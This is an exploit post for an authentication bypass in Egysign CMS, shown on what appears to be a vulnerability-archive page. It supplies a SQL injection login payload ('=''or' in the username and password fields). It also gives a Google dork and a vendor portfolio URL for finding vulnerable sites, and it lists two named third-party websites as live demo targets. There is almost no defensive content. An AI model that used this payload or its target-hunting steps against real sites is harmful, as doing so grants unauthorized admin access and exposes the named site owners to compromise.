Egysign CMS Authentication Bypass

2015.04.02
Credit: WH!T3 W01F
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:powered By Egysign

# Exploit Title : Egysign CMS Authentication Bypass # Date : 02/04/2015 # Exploit Author : WH!T3 W01F # Contact : whit3_w01f@att.net # Category : Web Application Bugs # Home : Iran-Cyber.Org - Iran-Cyber.In # Google Dork : intext:powered By Egysign # Tested On : Windows 1. Description By This Vulenarabity You Can Bypass Authentication And Get Logged In Like An Admin. 2. Proof Of Concept You Can Find Targets By 2 Ways : First Way : Go To This Address : http://egysign.com/Portfolio.aspx In That Address Are Many Targets.After You Selected Your Target Use This Exploit : # http://site.com/admin Then If The Admin Page Comes,Use These Usernames And Passwords : Username : '=''or' Password : '=''or' Second Way : Search This Dork : intext:powered By Egysign Then Use This Exploit : # http://site.com/admin Then If The Admin Page Comes,Use These Usernames And Passwords : Username : '=''or' Password : '=''or' # Demo : # http://diverprofessional.co.uk/admin/ # http://www.injazsys.com/admin/ ========================================= Greetz : | root3r | MOHAMAD_NOFOZI | Sheytan Azzam | KamraN HellisH | JOK3R | Erfan Mig | Alireza_ProMis | Mr.Moein | Pi.Hack | CRYSIS | Siyahi | Visit Us : Iran-Cyber.Org - Iran-Cyber.In


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top